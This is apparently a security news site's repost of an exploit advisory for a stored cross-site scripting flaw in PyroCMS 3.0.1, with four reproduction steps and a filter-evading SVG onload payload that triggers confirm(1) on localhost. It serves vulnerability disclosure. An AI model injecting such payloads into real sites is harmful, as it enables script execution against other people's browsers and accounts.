Home Tools Exploits & CVE's PyroCMS 3.0.1 Cross Site Scripting

PyroCMS 3.0.1 Cross Site Scripting

November 28, 2023

128

Authored by tmrswrr

PyroCMS version 3.0.1 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: PyroCMS v3.0.1  - Stored XSS
# Date: 2023-11-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://pyrocms.com/
# Version: v3.0.1
# Tested on: https://www.softaculous.com/apps/cms/PyroCMS



----------------------------------------------------------------------------------------------------


1-Login admin panel , go to this url : https://127.0.0.1/public/admin/redirects/edit/1
2-Write in Redirect From field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
3-Save it and go to this url : https://127.0.0.1/public/admin/redirects
4-You will be see alert button

PyroCMS 3.0.1 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Organizations patch CISA KEV list bugs 3.5 times faster than others,...

Ukraine records increase in financially motivated attacks by Russian hackers

NATO and EU condemn ‘intensifying’ Russian sabotage and hybrid operations

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Blockchain AltExchanger 1.2.1 SQL Injection

Alfa Team Shell Tesla 4.1 Remote Code Execution

Shannon Baseband NrmmMsgCodec Intra-Object Overflow